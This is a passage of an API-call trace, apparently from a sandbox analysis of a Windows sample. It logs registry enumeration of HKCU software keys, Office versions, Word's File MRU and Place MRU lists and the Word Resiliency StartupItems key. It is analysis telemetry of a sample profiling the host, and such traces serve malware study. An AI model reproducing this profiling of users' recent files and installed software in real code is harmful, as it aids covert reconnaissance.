[0086.175] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x19, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MSDAIPP", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.175] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x1a, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MSF", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.176] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x1b, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Multimedia", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.176] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x1c, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Notepad", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.176] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x1d, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Office", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.176] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x1e, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OneDrive", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.176] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x1f, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="PeerNet", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.176] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x20, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Protected Storage System Provider", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.176] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x21, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="RAS AutoDial", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.176] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x22, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Remote Assistance", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.176] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x23, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Shared", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.176] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x24, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Shared Tools", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.176] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x25, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SideShow", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.176] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x26, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SkyDrive", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.176] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x27, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Speech", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.176] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x28, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SQMClient", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.177] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x29, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SystemCertificates", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.177] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x2a, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="VBA", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.177] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x2b, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="VisualStudio", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.177] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x2c, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WAB", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.177] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x2d, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="wfs", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.177] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x2e, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.177] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x2f, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Mail", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.177] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x30, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Media", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.177] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x31, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows NT", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.177] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x32, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Script", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.177] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x33, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Script Host", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.177] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x34, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Search", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.177] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x35, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows Sidebar", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.178] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x36, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Wisp", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.178] RegOpenKeyExW (in: hKey=0x414, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c9d8 | out: phkResult=0x1c81c9d8*=0x410) returned 0x0
[0086.178] RegCloseKey (hKey=0x414) returned 0x0
[0086.178] RegQueryInfoKeyW (in: hKey=0x410, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c8fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c8f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c8fc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c8f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.178] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="11.0", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.178] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="12.0", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.178] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="14.0", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.178] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="15.0", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.178] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="16.0", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.178] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8.0", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.178] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Common", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.178] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Excel", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.178] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OneNote", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.179] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Outlook", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.179] RegEnumKeyExW (in: hKey=0x410, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="PowerPoint", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.179] RegEnumKeyExW (in: hKey=0x410, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.179] RegOpenKeyExW (in: hKey=0x410, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c9d8 | out: phkResult=0x1c81c9d8*=0x414) returned 0x0
[0086.179] RegCloseKey (hKey=0x410) returned 0x0
[0086.179] RegQueryInfoKeyW (in: hKey=0x414, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c8fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c8f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c8fc*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c8f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.179] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Excel", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.179] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="PowerPoint", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.179] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Word", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.179] RegOpenKeyExW (in: hKey=0x414, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c9d8 | out: phkResult=0x1c81c9d8*=0x410) returned 0x0
[0086.179] RegCloseKey (hKey=0x414) returned 0x0
[0086.179] RegQueryInfoKeyW (in: hKey=0x410, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c8fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c8f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c8fc*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c8f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.179] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="File MRU", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.179] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Options", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.179] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Place MRU", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.180] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c9d8 | out: phkResult=0x1c81c9d8*=0x0) returned 0x2
[0086.180] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c8fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c8f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c8fc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c8f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.180] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AppEvents", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.180] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Console", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.180] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Control Panel", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.180] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Environment", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.180] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="EUDC", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.180] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Identities", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.180] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Keyboard Layout", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.180] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Network", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.180] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Printers", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.180] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Software", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.180] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.180] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81c988, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Volatile Environment", lpcchName=0x1c81c988, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.181] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8f8 | out: phkResult=0x1c81c8f8*=0x0) returned 0x2
[0086.181] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c81c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c818, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c81c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c818*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.181] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AppEvents", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.181] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Console", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.181] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Control Panel", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.181] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Environment", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.181] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="EUDC", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.181] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Identities", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.181] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Keyboard Layout", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.181] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Network", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.181] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Printers", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
